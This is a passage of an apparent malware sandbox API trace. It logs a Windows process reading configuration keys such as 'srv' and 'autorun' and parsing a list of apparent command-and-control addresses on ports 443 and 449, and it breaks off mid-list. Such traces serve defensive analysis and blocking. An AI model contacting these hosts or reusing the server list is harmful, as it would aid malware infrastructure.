	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.871] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.871] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.872] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6f0) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6f0) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6f0) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6f0) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6f0) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6f0) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6f0) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6f0) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff708) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff708) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff708) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="srv", cchLength=0x3 | out: lpsz="srv") returned 0x3
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff708) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="autorun", cchLength=0x7 | out: lpsz="autorun") returned 0x7
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff708) returned 1
	[0201.873] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6
	[0201.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff708) returned 1
	[0201.874] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0201.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff708) returned 1
	[0201.874] CharLowerBuffA (in: lpsz="ctl", cchLength=0x3 | out: lpsz="ctl") returned 0x3
	[0201.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff720) returned 1
	[0201.874] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6
	[0201.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff738) returned 1
	[0201.874] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0201.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff738) returned 1
	[0201.874] CharLowerBuffA (in: lpsz="module", cchLength=0x6 | out: lpsz="module") returned 0x6
	[0201.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff750) returned 1
	[0201.874] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0201.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff750) returned 1
	[0201.874] StrStrIW (lpFirst="85.209.162.216:443", lpSrch=":") returned=":443"
	[0201.874] lstrcpynW (in: lpString1=0x26cae88, lpString2="85.209.162.216:443", iMaxLength=15 | out: lpString1="85.209.162.216") returned="85.209.162.216"
	[0201.874] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.874] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.874] lstrcpynW (in: lpString1=0x22ff798, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.875] StrStrIW (lpFirst="85.209.162.217:443", lpSrch=":") returned=":443"
	[0201.875] lstrcpynW (in: lpString1=0x26cae88, lpString2="85.209.162.217:443", iMaxLength=15 | out: lpString1="85.209.162.217") returned="85.209.162.217"
	[0201.875] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.875] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.875] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.875] StrStrIW (lpFirst="51.38.101.194:443", lpSrch=":") returned=":443"
	[0201.875] lstrcpynW (in: lpString1=0x26cae88, lpString2="51.38.101.194:443", iMaxLength=14 | out: lpString1="51.38.101.194") returned="51.38.101.194"
	[0201.875] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.875] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.875] lstrcpynW (in: lpString1=0x22ff798, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.875] StrStrIW (lpFirst="51.77.92.215:443", lpSrch=":") returned=":443"
	[0201.876] lstrcpynW (in: lpString1=0x26cae88, lpString2="51.77.92.215:443", iMaxLength=13 | out: lpString1="51.77.92.215") returned="51.77.92.215"
	[0201.876] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.876] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.876] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.876] StrStrIW (lpFirst="185.68.93.26:443", lpSrch=":") returned=":443"
	[0201.876] lstrcpynW (in: lpString1=0x26cae88, lpString2="185.68.93.26:443", iMaxLength=13 | out: lpString1="185.68.93.26") returned="185.68.93.26"
	[0201.876] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.876] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.876] lstrcpynW (in: lpString1=0x22ff798, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.876] StrStrIW (lpFirst="37.228.119.247:443", lpSrch=":") returned=":443"
	[0201.877] lstrcpynW (in: lpString1=0x26cae88, lpString2="37.228.119.247:443", iMaxLength=15 | out: lpString1="37.228.119.247") returned="37.228.119.247"
	[0201.877] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.877] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.877] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.877] StrStrIW (lpFirst="95.213.191.109:443", lpSrch=":") returned=":443"
	[0201.877] lstrcpynW (in: lpString1=0x26cae88, lpString2="95.213.191.109:443", iMaxLength=15 | out: lpString1="95.213.191.109") returned="95.213.191.109"
	[0201.877] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.877] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.877] lstrcpynW (in: lpString1=0x22ff798, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.877] StrStrIW (lpFirst="193.0.178.20:443", lpSrch=":") returned=":443"
	[0201.878] lstrcpynW (in: lpString1=0x26cae88, lpString2="193.0.178.20:443", iMaxLength=13 | out: lpString1="193.0.178.20") returned="193.0.178.20"
	[0201.878] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.878] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.878] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.878] StrStrIW (lpFirst="195.123.209.224:443", lpSrch=":") returned=":443"
	[0201.878] lstrcpynW (in: lpString1=0x26cae88, lpString2="195.123.209.224:443", iMaxLength=16 | out: lpString1="195.123.209.224") returned="195.123.209.224"
	[0201.878] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.878] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.878] lstrcpynW (in: lpString1=0x22ff798, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.878] StrStrIW (lpFirst="192.227.232.63:443", lpSrch=":") returned=":443"
	[0201.879] lstrcpynW (in: lpString1=0x26cae88, lpString2="192.227.232.63:443", iMaxLength=15 | out: lpString1="192.227.232.63") returned="192.227.232.63"
	[0201.879] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.879] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.879] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.879] StrStrIW (lpFirst="82.146.57.249:443", lpSrch=":") returned=":443"
	[0201.879] lstrcpynW (in: lpString1=0x26cae88, lpString2="82.146.57.249:443", iMaxLength=14 | out: lpString1="82.146.57.249") returned="82.146.57.249"
	[0201.879] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.879] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.879] lstrcpynW (in: lpString1=0x22ff798, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.879] StrStrIW (lpFirst="173.247.238.184:443", lpSrch=":") returned=":443"
	[0201.880] lstrcpynW (in: lpString1=0x26cae88, lpString2="173.247.238.184:443", iMaxLength=16 | out: lpString1="173.247.238.184") returned="173.247.238.184"
	[0201.880] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.880] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.880] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.880] StrStrIW (lpFirst="195.123.240.58:443", lpSrch=":") returned=":443"
	[0201.881] lstrcpynW (in: lpString1=0x26cae88, lpString2="195.123.240.58:443", iMaxLength=15 | out: lpString1="195.123.240.58") returned="195.123.240.58"
	[0201.881] StrStrIW (lpFirst="443", lpSrch=":") returned 0x0
	[0201.881] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.881] lstrcpynW (in: lpString1=0x22ff798, lpString2="443", iMaxLength=4 | out: lpString1="443") returned="443"
	[0201.881] StrStrIW (lpFirst="200.122.209.78:449", lpSrch=":") returned=":449"
	[0201.881] lstrcpynW (in: lpString1=0x26cae88, lpString2="200.122.209.78:449", iMaxLength=15 | out: lpString1="200.122.209.78") returned="200.122.209.78"
	[0201.881] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.881] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.881] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.881] StrStrIW (lpFirst="200.54.14.61:449", lpSrch=":") returned=":449"
	[0201.882] lstrcpynW (in: lpString1=0x26cae88, lpString2="200.54.14.61:449", iMaxLength=13 | out: lpString1="200.54.14.61") returned="200.54.14.61"
	[0201.882] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.882] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.882] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.882] StrStrIW (lpFirst="181.143.17.66:449", lpSrch=":") returned=":449"
	[0201.882] lstrcpynW (in: lpString1=0x26cae88, lpString2="181.143.17.66:449", iMaxLength=14 | out: lpString1="181.143.17.66") returned="181.143.17.66"
	[0201.882] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.882] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.882] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.882] StrStrIW (lpFirst="186.43.33.81:449", lpSrch=":") returned=":449"
	[0201.883] lstrcpynW (in: lpString1=0x26cae88, lpString2="186.43.33.81:449", iMaxLength=13 | out: lpString1="186.43.33.81") returned="186.43.33.81"
	[0201.883] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.883] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.883] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.883] StrStrIW (lpFirst="181.143.102.30:449", lpSrch=":") returned=":449"
	[0201.883] lstrcpynW (in: lpString1=0x26cae88, lpString2="181.143.102.30:449", iMaxLength=15 | out: lpString1="181.143.102.30") returned="181.143.102.30"
	[0201.883] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.883] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.883] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.883] StrStrIW (lpFirst="190.0.20.114:449", lpSrch=":") returned=":449"
	[0201.884] lstrcpynW (in: lpString1=0x26cae88, lpString2="190.0.20.114:449", iMaxLength=13 | out: lpString1="190.0.20.114") returned="190.0.20.114"
	[0201.884] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.884] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.884] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.884] StrStrIW (lpFirst="190.151.25.178:449", lpSrch=":") returned=":449"
	[0201.884] lstrcpynW (in: lpString1=0x26cae88, lpString2="190.151.25.178:449", iMaxLength=15 | out: lpString1="190.151.25.178") returned="190.151.25.178"
	[0201.884] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.884] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.884] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.884] StrStrIW (lpFirst="201.184.69.50:449", lpSrch=":") returned=":449"
	[0201.885] lstrcpynW (in: lpString1=0x26cae88, lpString2="201.184.69.50:449", iMaxLength=14 | out: lpString1="201.184.69.50") returned="201.184.69.50"
	[0201.885] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.885] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.885] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.885] StrStrIW (lpFirst="190.109.165.197:449", lpSrch=":") returned=":449"
	[0201.885] lstrcpynW (in: lpString1=0x26cae88, lpString2="190.109.165.197:449", iMaxLength=16 | out: lpString1="190.109.165.197") returned="190.109.165.197"
	[0201.885] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.885] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.885] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.885] StrStrIW (lpFirst="125.209.82.158:449", lpSrch=":") returned=":449"
	[0201.886] lstrcpynW (in: lpString1=0x26cae88, lpString2="125.209.82.158:449", iMaxLength=15 | out: lpString1="125.209.82.158") returned="125.209.82.158"
	[0201.886] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.886] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.886] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.886] StrStrIW (lpFirst="80.173.224.81:449", lpSrch=":") returned=":449"
	[0201.886] lstrcpynW (in: lpString1=0x26cae88, lpString2="80.173.224.81:449", iMaxLength=14 | out: lpString1="80.173.224.81") returned="80.173.224.81"
	[0201.886] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.886] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.886] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.886] StrStrIW (lpFirst="76.107.90.235:449", lpSrch=":") returned=":449"
	[0201.887] lstrcpynW (in: lpString1=0x26cae88, lpString2="76.107.90.235:449", iMaxLength=14 | out: lpString1="76.107.90.235") returned="76.107.90.235"
	[0201.887] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.887] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.887] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.887] StrStrIW (lpFirst="181.129.136.226:449", lpSrch=":") returned=":449"
	[0201.887] lstrcpynW (in: lpString1=0x26cae88, lpString2="181.129.136.226:449", iMaxLength=16 | out: lpString1="181.129.136.226") returned="181.129.136.226"
	[0201.887] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.887] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.887] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.887] StrStrIW (lpFirst="191.103.219.138:449", lpSrch=":") returned=":449"
	[0201.888] lstrcpynW (in: lpString1=0x26cae88, lpString2="191.103.219.138:449", iMaxLength=16 | out: lpString1="191.103.219.138") returned="191.103.219.138"
	[0201.888] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.888] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.888] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.888] StrStrIW (lpFirst="202.63.242.48:449", lpSrch=":") returned=":449"
	[0201.888] lstrcpynW (in: lpString1=0x26cae88, lpString2="202.63.242.48:449", iMaxLength=14 | out: lpString1="202.63.242.48") returned="202.63.242.48"
	[0201.888] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.888] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.888] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.888] StrStrIW (lpFirst="181.176.191.5:449", lpSrch=":") returned=":449"
	[0201.889] lstrcpynW (in: lpString1=0x26cae88, lpString2="181.176.191.5:449", iMaxLength=14 | out: lpString1="181.176.191.5") returned="181.176.191.5"
	[0201.889] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.889] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.889] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.889] StrStrIW (lpFirst="190.117.66.194:449", lpSrch=":") returned=":449"
	[0201.889] lstrcpynW (in: lpString1=0x26cae88, lpString2="190.117.66.194:449", iMaxLength=15 | out: lpString1="190.117.66.194") returned="190.117.66.194"
	[0201.889] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.889] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.889] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.889] StrStrIW (lpFirst="186.226.188.105:449", lpSrch=":") returned=":449"
	[0201.890] lstrcpynW (in: lpString1=0x26cae88, lpString2="186.226.188.105:449", iMaxLength=16 | out: lpString1="186.226.188.105") returned="186.226.188.105"
	[0201.890] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.890] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.890] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.890] StrStrIW (lpFirst="186.159.1.217:449", lpSrch=":") returned=":449"
	[0201.890] lstrcpynW (in: lpString1=0x26cae88, lpString2="186.159.1.217:449", iMaxLength=14 | out: lpString1="186.159.1.217") returned="186.159.1.217"
	[0201.890] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.890] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.890] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.890] StrStrIW (lpFirst="190.151.10.114:449", lpSrch=":") returned=":449"
	[0201.891] lstrcpynW (in: lpString1=0x26cae88, lpString2="190.151.10.114:449", iMaxLength=15 | out: lpString1="190.151.10.114") returned="190.151.10.114"
	[0201.891] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.891] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.891] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.891] StrStrIW (lpFirst="209.45.30.2:449", lpSrch=":") returned=":449"
	[0201.891] lstrcpynW (in: lpString1=0x26cae88, lpString2="209.45.30.2:449", iMaxLength=12 | out: lpString1="209.45.30.2") returned="209.45.30.2"
	[0201.891] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.891] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.891] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.891] StrStrIW (lpFirst="181.115.236.26:449", lpSrch=":") returned=":449"
	[0201.891] lstrcpynW (in: lpString1=0x26cae88, lpString2="181.115.236.26:449", iMaxLength=15 | out: lpString1="181.115.236.26") returned="181.115.236.26"
	[0201.891] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.892] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.892] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.892] StrStrIW (lpFirst="190.196.32.42:449", lpSrch=":") returned=":449"
	[0201.892] lstrcpynW (in: lpString1=0x26cae88, lpString2="190.196.32.42:449", iMaxLength=14 | out: lpString1="190.196.32.42") returned="190.196.32.42"
	[0201.892] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.892] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff7b0, Size=0x10) returned 0x22ff798
	[0201.892] lstrcpynW (in: lpString1=0x22ff7b0, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.892] StrStrIW (lpFirst="181.48.203.10:449", lpSrch=":") returned=":449"
	[0201.892] lstrcpynW (in: lpString1=0x26cae88, lpString2="181.48.203.10:449", iMaxLength=14 | out: lpString1="181.48.203.10") returned="181.48.203.10"
	[0201.892] StrStrIW (lpFirst="449", lpSrch=":") returned 0x0
	[0201.893] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff798, Size=0x10) returned 0x22ff7b0
	[0201.893] lstrcpynW (in: lpString1=0x22ff798, lpString2="449", iMaxLength=4 | out: lpString1="449") returned="449"
	[0201.893] StrStrIW (lpFirst="131.161.252.141:449", lpSrch=":") returned=":449"
